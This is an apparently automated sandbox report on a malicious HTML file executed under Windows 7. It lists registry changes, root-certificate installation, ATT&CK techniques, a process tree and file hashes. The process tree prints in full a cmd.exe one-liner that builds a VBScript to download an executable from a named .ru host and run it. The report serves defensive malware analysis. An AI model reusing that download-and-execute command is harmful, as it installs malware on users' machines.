42e7d0d6325157c35944e0cc4b2a07b3dece5b41bdb9e3be1557e7970e352c33

Analysis

max time kernel
120s
max time network
132s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 05:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eab1b26e06a91f5532d7e5382269c7d3_JaffaCakes118.html
Size

17KB
MD5

eab1b26e06a91f5532d7e5382269c7d3
SHA1

bd01eb29b9a3678c6842a0142be9748733e22cdf
SHA256

42e7d0d6325157c35944e0cc4b2a07b3dece5b41bdb9e3be1557e7970e352c33
SHA512

59b09596a9ee90be6298523aa97439e3e9520206f439f2d6f0b13309f2e40ce3b3abddbe8d998220d1756dd167be3bf5ede97be80420653a0f2feaf8419e135c
SSDEEP

384:k03+e+z3FU5dHdBve+z3Fb4e+z3Fme+z3Fq:4f+fafAfA

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	2604	cscript.exe
7	2604	cscript.exe
9	2604	cscript.exe
11	2604	cscript.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50536612570adb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D620C21-764A-11EF-AF16-EA7747D117E6} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000dfefa6a3b57eb7385d30e2bc915c4466de7c5983b32eb18960106109fed54b84000000000e80000000020000200000003c77b229c468704cb40339dd0b9df4a0c17e2b8d2e500c0590825bece4e3cabe90000000161f419e9ec0259c845b3b5a5b635ff663d5b932299e290256f567ad2fe0fa853855ad37bf42264c461eb52510b3753aee38eeaac6c7803d83179f55c229e00701d3571177c5c4fa97cd60c4be086f9e5e4ac16567ebb1bb4f0f35438757d909b91bba5126fdd63e1f3a94c072795185aa579890dbd41bae5bb6201729458ce5af45cf322db63195e8c17fc103f918a440000000f8cf52e91d6f5940886903d707a9ef46fe6c1b2133b72bca88476fee9ab7111a1cd4c48de29ce8881d8ee8587ee7e1f236152f993aedb2facae47dce02671abf	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432886539"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000ad40b2a17c5ed50c2bce4b7866318ce895d58fe9dfc2e3d310411870cf6cfa3e000000000e8000000002000020000000545ffedca62847f23e90dfe11e5f3db55bb810df3450a892cc1495398fbf322320000000d7955f06d629faacd616fe295c3c06f160f2ff198a3f240b51b8e672a80401a340000000600dd3fef579edff08193142c9677203f5eed760431bc3d30b4f9f3d41032b3d66eb81ca389a1bf1e7130ef2a9c2acaf77acf53a89efc4cc7294bc1b61f3bcd6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	cscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	cscript.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2764	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2764	iexplore.exe
2764	iexplore.exe
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2764 wrote to memory of 2824	2764	iexplore.exe	30
PID 2764 wrote to memory of 2824	2764	iexplore.exe	30
PID 2764 wrote to memory of 2824	2764	iexplore.exe	30
PID 2764 wrote to memory of 2824	2764	iexplore.exe	30
PID 2824 wrote to memory of 2112	2824	IEXPLORE.EXE	31
PID 2824 wrote to memory of 2112	2824	IEXPLORE.EXE	31
PID 2824 wrote to memory of 2112	2824	IEXPLORE.EXE	31
PID 2824 wrote to memory of 2112	2824	IEXPLORE.EXE	31
PID 2112 wrote to memory of 2604	2112	cmd.exe	33
PID 2112 wrote to memory of 2604	2112	cmd.exe	33
PID 2112 wrote to memory of 2604	2112	cmd.exe	33
PID 2112 wrote to memory of 2604	2112	cmd.exe	33

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\eab1b26e06a91f5532d7e5382269c7d3_JaffaCakes118.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2764
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2764 CREDAT:275457 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CD %TEMP%&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>XPUKgOHC.vbs&@echo objXMLHTTP.open "GET","http://natmasla.ru/ath/sploit/natmasla.exe",false>>XPUKgOHC.vbs&@echo objXMLHTTP.send()>>XPUKgOHC.vbs&@echo If objXMLHTTP.Status=200 Then>>XPUKgOHC.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>XPUKgOHC.vbs&@echo objADOStream.Open>>XPUKgOHC.vbs&@echo objADOStream.Type=1 >>XPUKgOHC.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>XPUKgOHC.vbs&@echo objADOStream.Position=0 >>XPUKgOHC.vbs&@echo objADOStream.SaveToFile "%TEMP%\natmasla.exe">>XPUKgOHC.vbs&@echo objADOStream.Close>>XPUKgOHC.vbs&@echo Set objADOStream=Nothing>>XPUKgOHC.vbs&@echo End if>>XPUKgOHC.vbs&@echo Set objXMLHTTP=Nothing>>XPUKgOHC.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>XPUKgOHC.vbs&@echo objShell.Exec("%TEMP%\natmasla.exe")>>XPUKgOHC.vbs&cscript.exe %TEMP%\XPUKgOHC.vbs&del %TEMP%\XPUKgOHC.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\XPUKgOHC.vbs
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
57b3655cab7b9035b07e3c9487f7528a

SHA1
79695b8d9422cfb15ace910f98e259db296dbbdc

SHA256
2642813c0dce79c9e0ba7d090b59cbd2dcfd131093462dd51f1d8165ff53764e

SHA512
147a2de235674b7d6e654cebeb6a36b0b0a5958178feb103df6d381dce7933faf4498f0372d34bfeb60fb7f93e91f0774d9ad18200e6e0cb1a6daeacad554009

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
478111276de9ee93a0f09748b6c618bf

SHA1
9ce02fd5872667469e2ac9dcbb0e66a4c94c7730

SHA256
a40cdcc4e8789f39b1e743b6b0b57ae7b0432f5381b3f0be8863d1310e95d21c

SHA512
8492595764ffe8142b28f654d3b9a31933b38d1c8431c44f8da446757c0ff9f4a1b3552edce0b81cdcf20f819602a790e16affa7a870f1792b0cb25195b3fbf1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
272086328ba88a8dca625a306d816dd0

SHA1
388ba245acd0a55cf7d25fc8fc72402624e0b90d

SHA256
e92a7d52323c6fc026fe80df3cc803d04f1b1c8d102eb54a4234fb25054996e3

SHA512
7eed086ec21ce57815f774c330b02f8c0cbea4b89cfb417b3da4000367d437ce6c0b3bed92830b0864135f516b55e4fea199dd790bd87eb95c897157118c8b42

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
930ecddbdbf23c38abeefff0f276d161

SHA1
d5974c04d17dee53e22e88478713ee53ebce5a07

SHA256
ec7140332d9681a4abf565e273d70befff31eb6b538ea319cfd0c2bae61e1aee

SHA512
c0ead9da75f5145a0202b1843a1357b7d46f98b71e52a0840abd6bae0339c52de74c12b14af65f94cb09fbc76935559f907f3e8037555593f8601c9c2c24b056

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4780c451bd1546fbfeb49373fcf020cc

SHA1
ca48eaab9cca3a80e62a2c2cdda79cae4e814729

SHA256
2b780b64167793b8cba86c061642faa4f20c43966a8ed1d399be527d2473cca7

SHA512
4842da64f7b0e0dfbb159e7a6ce6616f3056beaa35c1db475cb581fc47825e7eb18d2a8e697e23e7da48ba6d322b8d0acae56664a1cd4f8072a04fabd953d2b0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b14878a1612eef0d863bfa91234afa08

SHA1
4a60a88dc3ce22c035f6e946efdc52b361f4ea31

SHA256
7030aff40924fdd960d5f1cfd3fb6639eb4bed26eba5d9f8f3fb967273d0d269

SHA512
20a0d4fc784304a27cfad3edd8d3158af00a65f881b0c306eae4c697e77980feb6257f4d72be58e6128f5dc1d19ffcbb1d8c501b47df700c7df539bfaa85c3ff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f3086d54cd77cf9aac45cba33304705a

SHA1
7be74290f833f164ce4148e01466f7f6019f7cad

SHA256
33541936f2164a2c9198c2acaa8a368447dfe2d24c2deefaea49829d1e76028f

SHA512
9451d8a6aaa1334f2ceb9435070ba38eeb42ba287b6812830e3d8a2a724d203076d1b588bcdd6e02b551d0d5fabe9976cb2d0628e57ca050587b1c6a1b14dc52

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2f5761c4336fbf33366ef6f3ff43b7c9

SHA1
eb37e66f53203e301f883a1a52a5a90bd3498e16

SHA256
ce52e44386675c89e501f23e23c21b43e6757066e7b28984aa076ae10230216a

SHA512
8ef3223c2a8421ccd075ba1ab0ff64c33cee55bc4feb71cde812b5f7a4eab5e218f9f09a8a5070b24fc701c145f1e31845c879041902ed404e867609627cd422

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9a5d07f29263c70ae09fcc6b8defff6d

SHA1
621200034def40a8143a9b118d6bfa05fe7be977

SHA256
266d39ca0ebbc4f7bac7a618cea99b8703de03a1e294dd2ac7bf212409ae59dd

SHA512
79c6cabc5088cb35dede578607299a7d8b7a61f50aafc209bf21a7e0719da5ab9d6f3e57400222cb3a0f57166dee6bada448ed8e577efb066770ad464e6a8e62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b0f6c52a389b88f235b4d6ddad4883d5

SHA1
34b9d81ebbb1322e16c67fbe3227ee39f365a6c5

SHA256
9aeda33eaebb415c7397a4b8aefa35d2db315df494183970a41d80809935a289

SHA512
1b1c012615310d759116fbcca95db3389efa64e9768c535a1bade8562b07c0b18a4254d6f32eb8cd5c767aae73a7d9d64680b83daf8c65bf0d2e7fb88ab11f49

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b04744f2a53b2cc88491a1b828588467

SHA1
f2145d7d059d5325cb384baec32099d73f522499

SHA256
fa2dd6e203fc11eb876b7a4649a96ad0af07a2630eedcdd00511ada8b605cda9

SHA512
3e9a7a2d8947a51b43e87d812e76830fa523f47f02a965c558c102bc5a5ea3ec57be4422ec33a865d820a46fdd87f8f996e1d76a66558c722d1e38326ab611d8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ea810b40c850c5a98ab3d30fd7a1e976

SHA1
e0cb2121169416dd2fe01b07ca92fb5a3774af8c

SHA256
a516f7fa00992d4825b80350f311231281ee67298be3d9e327f90a635786515f

SHA512
40f770f500d9a1d2cd376ceaca28cdb53aff93f8c90cd6052d08f2003352af64f9189f361e7bbd31d65ad534d0d5d987b501c41cac4da31d597bd88fed90de0e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
64345f1c7bc852c1d4ce37e80c694cf5

SHA1
77ca87a75356414992ca2a77bfb3f01378ba6627

SHA256
cdd29447faebf405580109ed59c4b8ad64b54ff083cd0315dff4bbfd64e224dc

SHA512
4da5782d84254ab6de3880f4df225ceb5e5f92da1b73c85ae17ba63924967f6f62658d5d7c145abe5402d9720213c4e4494ea5a6511000dca596ad11adeb1eac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b613205fe28e7767e2f4594940c03f59

SHA1
e3970e8e9716f29ccac87bc23314ad2a31111df8

SHA256
e573bdc3cde0fe44d04b42d467caef208735f23192fa0822407d7be9915a11cd

SHA512
76f7d17e17caaedfbfb89a66dfa792a4fec56bf34334daab28e45909e5caf45836f75f7b954af2d4e4b07390a1281a6efc11df25f8226e6081bcd5847eb99cc9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
de92fdf256807f8489027338648e0616

SHA1
b8b30e1cab77842016b1c4a4f8aae04cb8a5cde3

SHA256
a088a6bd8002d7c477e447d774b4a155c986bd7c0088c3a9e8a91ff8f9c00679

SHA512
c6a08c51094e68849ae7e1c8555d6d17bb430b8b1081c0f29e2b32f170a760620cdfdac9788083460e9ae3204576b9353c449f6bda456c8e03f94f7fadfc4eae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dde821fd2241d6269130dad304ed430a

SHA1
f4677c9032f1c7a6029a4184e5725d7bce1721e0

SHA256
24c4c7a797d618a708142fc6652bb0a6df95d4bd6a9da6368e8e01a9afb8a70f

SHA512
7a37a23d59878aee3a300d25eb7bf589cdbae222a078dc575d740fe5e7222bc7b457544806c717aae7b37ecad901b47741b9bbb20945f5b3ddd9fccd8a8e51ad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1c24c8b5321fde051a31f7720eb2bfc0

SHA1
2740017a0d0588b31d730c23d748c32351205d2e

SHA256
c257498bebd20d8c19b53005c09c7ae274be7d6b7333b8721a77cca0ffaaaa9c

SHA512
9abade5f4b0a74cb3445da439a4fff2b992b958ced6f23d1b559dfdbf59bb2f368e5f9468ee1e2fb4ae7f327c894345d2799b627e3c9101cedf94ef40b801b6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2fbf42dc3d47a0c40e6c1da5d66c9c81

SHA1
1d864abf2c95912137ca975ceea8467f7a43502e

SHA256
909f6c3a3b6086e32fd59e999f30fcb4c1050588efe23fd476d2ef0db68cfdec

SHA512
0dafb248095cf785fb4d0a72c5585701ebf83b26446ccd2bbb2ba7dd80adb59bd8b8d7cae4434f50bc550e606ff6dcde36e83cc31b7097b1ea27e4cba761183a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4D95.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4DA7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\XPUKgOHC.vbs

Filesize
590B

MD5
56959496ff43313df107f921870bc5b3

SHA1
47f0164434e1408ccf3f4590650edcdea09e5e47

SHA256
0f2e4027c87957eba8d868f5ded4829845131c3435ddfba4575c8ef241062524

SHA512
2e44553c08f8e060e7b99a6da156d26b443bed244ee2b4e77e0b11dd0c4845b69b8450d158940752411d1dd5f7c997ea6c41752d71cc66b5edda5372ab502062

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads